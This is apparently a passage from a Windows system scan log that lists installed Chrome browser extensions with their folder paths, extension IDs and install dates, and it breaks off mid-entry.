CHR Extension: (Refined GitHub) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\hlepfoohegkhhmjieoechaddaejaokhf [2020-01-29]
CHR Extension: (Weather) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\iolcbmjhmpdheggkocibajddahbeiglb [2019-12-03]
CHR Extension: (Reddit Enhancement Suite) -
C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb [2020-01-26]
CHR Extension: (Buster: Captcha Solver for Humans) -
C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\mpbjkejclgfgadiemmefgebjfooflfhl [2019-12-03]
CHR Extension: (Chrome Web Store Payments) -
C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-12-03]
CHR Extension: (Amazon Assistant for Chrome) -
C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\pbjikboenpfhbbejgkoklgkhjpfogcam [2019-12-03]
CHR Extension: (Gmail) - C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-12-03]
CHR Extension: (Chrome Media Router) -
C:\Users\Admin\AppData\Local\Google\Chrome\User
Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-01-21]
CHR HKLM-x32\...\Chrome\Extension: [dhancbnhabhandieicagelcddkdfgoif] - C:\Program
Files (x86)\Allavsoft\Video Downloader
Converter\extensions\3.22.1.7308\BVDChromeExt.crx [2020-01-21]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]